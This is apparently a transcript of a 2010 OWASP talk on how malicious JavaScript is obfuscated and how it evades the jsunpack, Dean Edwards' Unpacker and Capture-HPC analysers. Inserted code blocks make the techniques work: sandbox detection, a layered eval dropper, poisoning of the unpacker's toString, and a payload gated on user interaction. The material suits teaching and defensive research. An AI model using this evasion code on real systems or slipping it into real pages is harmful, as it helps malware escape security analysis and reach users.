Creating, obfuscating and analyzing malware JavaScript
DESCRIPTION
Malware attacks on unaware Internet users' browsers are becoming more and more common. New techniques for bypassing the filters used by security vendors keep emerging; in turn, the filters get better and new analysis tools are developed - the arms race continues. In this presentation you will learn how crackers try to hamper the work of security engineers, and how reversers overcome those obstacles. Emphasis is placed on the weaknesses of automated tools: we'll try to avoid detection by jsunpack and Capture-HPC, and we'll also trick Dean Edwards' Unpacker.
TRANSCRIPT
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
Creating, obfuscating and analyzing malware JavaScript
Krzysztof Kotowicz
PHP Developer
http://web.eskot.pl
Medycyna Praktyczna
June 2010
Plan
Theory - Obfuscation and analysis
in general
in JavaScript
Practice - evading automatic code analyzers
jsunpack
JavaScript unpacker
Capture-HPC
Theory
Obfuscation
Goal - make analysis harder
Obfuscation
There is no perfect obfuscation [cs.princeton.edu]
Analysis as debugging
Debugging is twice as hard as writing a program in the first place. So if you're as clever as you can be when you write it, how will you ever debug it? Brian Kernighan, The Elements of Programming Style
Obfuscation methods
for loop → while loop + if
Iteration → recursion
Complex logical tests
Dummy code branches
Quasitautologies [blog.didierstevens.com]
Enigmatic variable names
Obfuscation methods in JS
JavaScript is a dynamic and functional language
Code created at runtime – eval
String.fromCharCode, unescape
Regular expressions - String.replace
Packers, e.g. [dean.edwards.name]
[developer.yahoo.com]
[malwareguru.org]
[closure-compiler.appspot.com]
Others - e.g. WhiteSpace Obfuscation [ktcorpsecurity.com]
Active defense against analysis
Function.toString / arguments.callee.toString [isc.sans.org]
autoencryption [isc.sans.org]
browser detection
DOM
window, navigator
timings
cookies
mouse position, screen resolution
Malware served only once per IP [research.zscaler.com]
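The first two items above (Function.toString / arguments.callee.toString and "autoencryption") combine into one trick: the decryptor derives its key from its own source text, so the payload only decrypts while the function is byte-for-byte untouched. The following is an added example written for this transcript, not code from the slides or the demo repository. It uses a named function and Function.prototype.toString() rather than arguments.callee so it also runs in strict mode; the hash, the XOR "cipher" and the payload string are constructed for illustration, and the decrypted text is returned instead of being eval()ed.

```javascript
// Added example: self-keyed "autoencryption" via Function.prototype.toString().
// Any edit to unlock() (a breakpoint line, a beautifier pass, even a comment)
// changes the key, and the payload decrypts to junk.

function keyFromSource(src) {
  let h = 0x811c9dc5;                       // 32-bit FNV-1a: a fingerprint, not crypto
  for (let i = 0; i < src.length; i++) {
    h ^= src.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h;
}

function xorCodes(codes, key) {             // XOR with the four key bytes, repeating
  return codes.map((c, i) => c ^ ((key >>> ((i % 4) * 8)) & 0xff));
}

// Decryptor: reads its own source. Do not touch a single character of it.
function unlock(cipher) {
  var key = keyFromSource(unlock.toString());
  return String.fromCharCode.apply(null, xorCodes(cipher, key));
  // real malware would eval() the result here instead of returning it
}

// Packer side: encrypt the payload against the pristine decryptor source.
function pack(payload) {
  var codes = Array.from(payload, c => c.charCodeAt(0));
  return xorCodes(codes, keyFromSource(unlock.toString()));
}

// An analyst's copy of unlock() with one comment added: same logic,
// different source text, therefore a different key.
function unlockEdited(cipher) {
  var key = keyFromSource(unlockEdited.toString()); // TODO: dump key here
  return String.fromCharCode.apply(null, xorCodes(cipher, key));
}

const STAGE_TWO = "alert('stage two')";     // constructed payload
```

In practice the analyst's counter-move is to leave the function untouched and instead hook what it calls (eval, String.fromCharCode), which is exactly what the analysis slides below recommend.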
Active defense - know thy language
function is_even(n) {
  var parameter_is_even = (n % 2) == 0 ? true : false;
  return parameter_is_even;
}
alert(is_even(16));
Result
How to analyze malware JavaScript?
Know JavaScript!
Run the code & observe effects in a controlled environment
Overload functions
eval
String.fromCharCode
Deobfuscate parts of code
Be patient and creative
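The following added example (written for this transcript; not code from the slides or the demo repository) ties the "Obfuscation methods in JS" slide to the "overload eval / String.fromCharCode" advice above. obfuscate() wraps a constructed payload in the four mechanisms listed there (String.fromCharCode, unescape, String.replace, eval); peelLayers() then runs the result with eval replaced by a hook that records its argument and aborts, so every layer is logged and none executes. The payload URL is made up (bad.example is a reserved name) and the DECODER_HINT regex used to decide when to stop is my own heuristic.

```javascript
// Added example: a constructed multi-layer dropper and an analyst's peeler
// that overloads eval() and String.fromCharCode() so no layer ever runs.

const SAMPLE_PAYLOAD = "document.location = 'http://bad.example/landing';"; // constructed

// "malware side": eval( eval( "ev@l(unesc@pe('%..'))".replace(/@/g,"a") ) )
function obfuscate(js) {
  const codes = Array.from(js, c => c.charCodeAt(0)).join(",");       // String.fromCharCode layer
  const inner = "String.fromCharCode(" + codes + ")";
  const escaped = Array.from(inner, c =>                                // unescape layer
    "%" + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0")).join("");
  // String.replace layer: the keywords "eval"/"unescape" are absent from the text
  return 'eval(eval("ev@l(unesc@pe(\'' + escaped + '\'))".replace(/@/g, "a")))';
}

// "analyst side": heuristic for "this string is still a decoder, keep peeling"
const DECODER_HINT = /\b(eval|unescape|fromCharCode|replace)\s*\(/;

function peelLayers(code, maxLayers = 8) {
  const realEval = globalThis.eval;
  const realFromCharCode = String.fromCharCode;
  const layers = [], trace = [];
  const STOP = Symbol("stop");
  let captured = null;

  globalThis.eval = function (s) {             // hook: record what would run, then abort
    captured = String(s);
    trace.push("eval(" + captured.length + " chars)");
    throw STOP;
  };
  String.fromCharCode = function (...codes) {  // hook: log, but let decoding continue
    trace.push("String.fromCharCode(" + codes.length + " codes)");
    return realFromCharCode.apply(null, codes);
  };
  try {
    let current = code;
    for (let i = 0; i < maxLayers; i++) {
      let next = null;
      try {
        const v = realEval(current);           // indirect eval: the sample's eval() hits the hook
        if (typeof v === "string") next = v;   // value an enclosing eval() would have run
      } catch (e) {
        if (e !== STOP) throw e;
        next = captured;
      }
      if (next === null || next === current) break;
      layers.push(next);
      current = next;
      if (!DECODER_HINT.test(next)) break;     // looks like the final payload: stop before it runs
    }
  } finally {
    globalThis.eval = realEval;                // undo the overloads
    String.fromCharCode = realFromCharCode;
  }
  return { layers, trace };
}
```

Run peelLayers(obfuscate(SAMPLE_PAYLOAD)) and layers[] holds, in order, the unescape stage, the String.fromCharCode stage and finally the plaintext payload, while document.location is never assigned. The stop heuristic is the weak spot: a sample whose last decoder stage avoids every keyword in DECODER_HINT would be treated as final and left unpeeled, which is the "heuristics, not algorithm" point of the next slide.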
JavaScript analysis...
Is rather heuristics than algorithm
Is rather manual than automatic
Human is required
Tools help greatly, but they're not perfect
Practice
jsunpack
Runs JS inside SpiderMonkey [mozilla.org]
JS fetched from URL, PCAP, JS/HTML file…
SM is modified to include:
DOM emulation
browser objects emulation
onload() event
monitors eval(), setTimeout() and others
scans the code using signatures file
jsunpack - weak points
Emulates browser
Code that won't run (dead branches) will be checked with signatures only
Evading detection
We need to detect being run in jsunpack
if (fake_browser) {
  do_no_harm();
} else {
  redirect_to_malicious_website(); // or obfuscate an exploit
}
How to detect jsunpack?
Many, many ways:
Bad implementation of window.location
window.location.host = path to the analysed file (so it contains "/")
It adds its own global variables
fake_browser = window.location.host.match('/');
fake_browser = (typeof my_location != "undefined");
// my_navigator, my_activex, my_element, the_activex, app, ...
How to detect jsunpack?
It overloads some functions
Objects emulation has missing spots
fake_browser = (typeof PluginArray.prototype.refresh == "undefined");
fake_browser = (document.title == 'My Title');
fake_browser = (window.open.toString().match(/print/));
fake_browser = (alert.toString().match(/{\s*}/));
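As an added example (not code from the slides or the demo repository), the checks from the two "How to detect jsunpack?" slides folded into one function that scores an environment instead of acting on it, plus the branch from the "Evading detection" slide expressed as a decision. The function takes the browser objects as a parameter so it can be exercised outside a browser; in a page you would pass the real window, document and global object. The two environments at the bottom are constructed stand-ins: one reproduces the emulator artefacts named on the slides, the other mimics a browser whose natives report "[native code]". Neither is a real jsunpack session or a real browser.

```javascript
// Added example: jsunpack sandbox indicators from the slides, as a scoring function.
function sandboxIndicators(env) {
  const hits = [];
  const win = env.window, doc = env.document, globals = env.globals;

  // jsunpack fills window.location.host with the path of the file under analysis
  if (typeof win.location.host === "string" && win.location.host.indexOf("/") !== -1) {
    hits.push("window.location.host looks like a file path");
  }
  // helper globals the emulator leaves behind
  for (const name of ["my_location", "my_navigator", "my_activex", "my_element", "the_activex", "app"]) {
    if (name in globals) hits.push("emulator global " + name + " is defined");
  }
  // gaps in the emulated browser objects
  if (!globals.PluginArray || typeof globals.PluginArray.prototype.refresh !== "function") {
    hits.push("PluginArray.prototype.refresh is missing");
  }
  if (doc.title === "My Title") hits.push("document.title is the emulator default");
  // overloaded natives: a real browser's toString() says "[native code]"
  if (/print/.test(win.open.toString())) hits.push("window.open is a shim that print()s");
  if (/\{\s*\}/.test(win.alert.toString())) hits.push("alert() is an empty stub");
  return hits;
}

// the if/else from the "Evading detection" slide, returned as a label instead of acted on
function choosePath(env) {
  return sandboxIndicators(env).length > 0 ? "do_no_harm" : "redirect_to_malicious_website";
}

// browser natives stringify to "function name() { [native code] }"; mimic that
function nativeLike(name) {
  const f = function () {};
  f.toString = () => "function " + name + "() { [native code] }";
  return f;
}

// constructed environments for the demo
const JSUNPACK_LIKE = {
  window: {
    location: { host: "/tmp/samples/evil.js" },
    open: function () { print("window.open"); },   // JS shim, never called here
    alert: function () {},                          // empty stub
  },
  document: { title: "My Title" },
  globals: { my_location: {}, my_navigator: {} },  // no PluginArray at all
};
const BROWSER_LIKE = {
  window: { location: { host: "www.example.com" }, open: nativeLike("open"), alert: nativeLike("alert") },
  document: { title: "Welcome" },
  globals: { PluginArray: { prototype: { refresh: nativeLike("refresh") } } },
};
```

Note that every indicator is a difference between the emulator and a real browser, not a property of the malware itself, which is why a signature scan of the dead do_no_harm() branch tells jsunpack nothing.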
Jsunpack - bonus
jsunpack runs every <script> block, whatever its type attribute says
So code can be made to run in jsunpack but not in browsers, which ignore scripts of an unknown type
<script type="text/dummy"> // good enough for jsunpack </script>
DEMO 1
github.com/koto/owasp-malicious-javascript/
index.php / js.js - sandbox detection
(modify js.js to test different techniques)
jekyll2.html - Dr Jekyll attack
js.js - HTML hack
(shortest jsunpack disabler)
Note to online viewers:
Demos require checking and running the files locally - see attached docs
jsunpack - summary
You can easily detect being run in the jsunpack sandbox
When detected, you just skip doing bad stuff
If malware code is obfuscated, it will not be detected with signatures
You go under the radar of jsunpack analysis
Dean Edwards' Unpacker
A JavaScript Decompressor [dean.edwards.name]
Reverses Dean Edwards' packer
Packer works like this:
eval(function(p,a,c,k,e,r){/*code*/}(para, meters))
/* which is the same as */
var packer = function(p,a,c,k,e,r) {/**/};
var s = packer(para,meters);
eval(s);
Unpacker - step 1
Replace eval() with string assignment
value holds decompressed code
// packed code is in input
var input="eval(function(p,a,c,k....";
eval("var value=String" + input.slice(4)); // cut "eval"
// executed code will be:
var value=String(function(p,a,c,k..);
But! we're blindly executing cut&pasted code!
Unpacker - step 2
Use Function.toString() to display the code
Unpacked code WILL NOT RUN, it will just print!
Disclaimer - the real code is a bit different, but the concept is the same
eval( "var unpacked = function() {" + value + "}" );
alert(unpacked.toString());
Dean Edwards Unpacker - weak points
Concatenating strings and executing the resulting code (injection, anyone?)
Using a constant - we cut first 4 characters without looking at them
eval() without any validation
Depends on Function.toString() to print the code
Dean Edwards Unpacker - disarming
eval() takes a single parameter
String() takes a single parameter
...but you can pass more :) extra arguments are evaluated, then ignored
Arbitrary code execution without changing the p,a,c,k,e,r function!
eval("code");
eval("code", "ignored");
eval("code", malicious());
String("code", malicious());
Dean Edwards Unpacker - disarming
malicious() executes when the packed code runs in the browser
and again inside the unpacker, once eval() has been rewritten to String()
eval(function(p,a,c,k,e,r){...}(para,meters),malicious());
var value=String(function(p,a,c,k,e,r){...}(para,meters),malicious());
Dean Edwards Unpacker - disarming
What can we do in malicious()?
Unpacker uses Function.toString()
Let's override it!
malicious() is e.g. obfuscated:
Function.prototype.toString = function() { return 'harmless code'; }
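The three "disarming" slides above, as an added example written for this transcript (not the unpacker's real source, and not the demo2/evil.packed.js from the repository): naiveUnpack() re-implements the two steps described earlier (rewrite eval(...) to String(...) by cutting four characters, then wrap the result in a function and print it with toString()); BENIGN is a normal packed blob and EVIL is the same blob with the extra malicious() argument. The p,a,c,k,e,r function is replaced by a two-argument stand-in that just concatenates, and malicious() is declared in the same file so the unpacker's eval() can reach it, which models the real situation where the packed blob carries its own definition.

```javascript
// Added example: the extra-argument trick against a minimal re-implementation of
// the unpacker's two steps. Nothing here is the real unpacker code.

let disarmCalls = 0;            // how often malicious() ran inside the "analysis tool"

// what the packed code smuggles in as the ignored second argument
function malicious() {
  disarmCalls++;
  Function.prototype.toString = function () { return "harmless code"; };
  return "";
}

function naiveUnpack(input) {
  const pristineToString = Function.prototype.toString;
  try {
    if (input.slice(0, 4) !== "eval") throw new Error("not a packed blob");
    // step 1: eval(...) -> String(...) by blind string surgery, then run it.
    // Same as the slide's eval("var value=String" + input.slice(4)), but the
    // value is returned instead of leaked into the caller's scope.
    const value = eval("String" + input.slice(4));
    // step 2: wrap the decompressed code in a function and print it via toString()
    const unpacked = eval("(function(){" + value + "})");
    return unpacked.toString();
  } finally {
    Function.prototype.toString = pristineToString;   // keep the rest of this file sane
  }
}

// two-argument stand-in for the p,a,c,k,e,r decompressor: it just concatenates
const BENIGN = "eval(function(p,a){return p+a}('alert(','1)'))";
const EVIL   = "eval(function(p,a){return p+a}('alert(','1)'),malicious())";
```

With BENIGN the tool prints function(){alert(1)}; with EVIL, step 1 evaluates malicious() as a side effect of the String(...) call, the override is in place by the time step 2 calls toString(), and the analyst reads "harmless code". The finally block exists only so the rest of this file keeps working; the real tool has no such restore and stays poisoned for every later blob in the same page.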
DEMO 2
github.com/koto/owasp-malicious-javascript/
demo2/evil.packed.js
Dean Edwards Unpacker - proof of concept
High interaction client honeypots
Capture-HPC [projects.honeynet.org] as an example
Code is run in real browser in a virtual machine
Server serves URL list to visit
Client starts browsers and waits…
Code side-effects are monitored
Filesystem
Registry
Processes
If anything suspicious happens to the system, the URL is reported to the server as malicious
High interaction client honeypots
Runtime environment is the same
There is no emulation
Can we detect that we're being traced?
Weak point
High interaction client honeypots - robot
Doesn't move mouse
Doesn't click
Doesn't drag
Doesn't navigate
Is "stupid"
High interaction client honeypots - user
Moves mouse
Clicks
Drags
Navigates
Is stupid
Honeypots – social engineering
Honeypots - summary
No emulation layer to detect
Code is run in real browser
Weakest point is the lack of human element
Just run the code after detecting an interaction with the page
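The "just run the code after detecting an interaction" idea, as an added example written for this transcript (not code from the slides or the demo repository): interactionGate() arms the payload only after several distinct pointer positions and a click have been seen, which a crawler that loads the page and waits never produces. The gate is written against the addEventListener interface so it can be exercised here with a small fake event target; in a page you would pass document and a real payload. The thresholds, the event streams and the fake target are all constructed for the demo, and the payload here only counts how often it fired.

```javascript
// Added example: delay the payload until a human-looking interaction has happened.
function interactionGate(target, payload, opts) {
  const needMoves = (opts && opts.moves) || 5;     // distinct pointer positions
  const needClicks = (opts && opts.clicks) || 1;
  const positions = new Set();
  let clicks = 0, fired = false;

  function maybeFire() {
    if (!fired && positions.size >= needMoves && clicks >= needClicks) {
      fired = true;                                // deliver once, then stay quiet
      payload();
    }
  }
  // a robot that never touches the page never gets past these handlers
  target.addEventListener("mousemove", function (e) {
    positions.add(e.clientX + "," + e.clientY);    // a parked cursor counts once
    maybeFire();
  });
  target.addEventListener("click", function () {
    clicks++;
    maybeFire();
  });
}

// minimal stand-in for an EventTarget so the gate can be driven without a DOM
function fakeEventTarget() {
  const handlers = {};
  return {
    addEventListener(type, fn) { (handlers[type] = handlers[type] || []).push(fn); },
    dispatch(type, ev) { (handlers[type] || []).forEach(fn => fn(ev)); },
  };
}

// replay a constructed visit and report how many times the payload ran
function runScenario(events) {
  const target = fakeEventTarget();
  let delivered = 0;
  interactionGate(target, function () { delivered++; });
  for (const [type, ev] of events) target.dispatch(type, ev);
  return delivered;
}

// constructed visits
const ROBOT_VISIT = [];                            // Capture-HPC: loads the page, touches nothing
const USER_VISIT = [
  ["mousemove", { clientX: 12, clientY: 40 }],
  ["mousemove", { clientX: 80, clientY: 44 }],
  ["mousemove", { clientX: 150, clientY: 90 }],
  ["mousemove", { clientX: 210, clientY: 130 }],
  ["mousemove", { clientX: 260, clientY: 131 }],
  ["click", { clientX: 260, clientY: 131 }],
  ["click", { clientX: 260, clientY: 131 }],       // a second click must not re-fire
];
const PARKED_MOUSE_VISIT = Array(10).fill(["mousemove", { clientX: 5, clientY: 5 }])
  .concat([["click", { clientX: 5, clientY: 5 }]]);
```

Counting distinct positions rather than raw events is the part that matters: a honeypot that synthesises a single click or jiggles the cursor in place still fails the gate, while the gate costs a real visitor nothing.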
Summary
Obfuscation can only make analysis slower
Code can actively defend against analysis
Human is required to do a complete analysis
Analysis requires strong skills
Automatic tools can be fooled
detect emulation differences
errors
lack of full interaction with a webpage
Links
Demo source: github.com/koto/owasp-malicious-javascript
Tools
jsunpack.blogspot.com
dean.edwards.name/unpacker/
projects.honeynet.org/capture-hpc
malzilla.sourceforge.net
Obfuscation and analysis
isc.sans.org/diary.html
www.malwareguru.org
delicious.com/koto/obfuscation
closure-compiler.appspot.com
JavaScript
www.slideshare.net/ferrantes/just-advanced-javascript
jsninja.com
[email protected] http://blog.kotowicz.net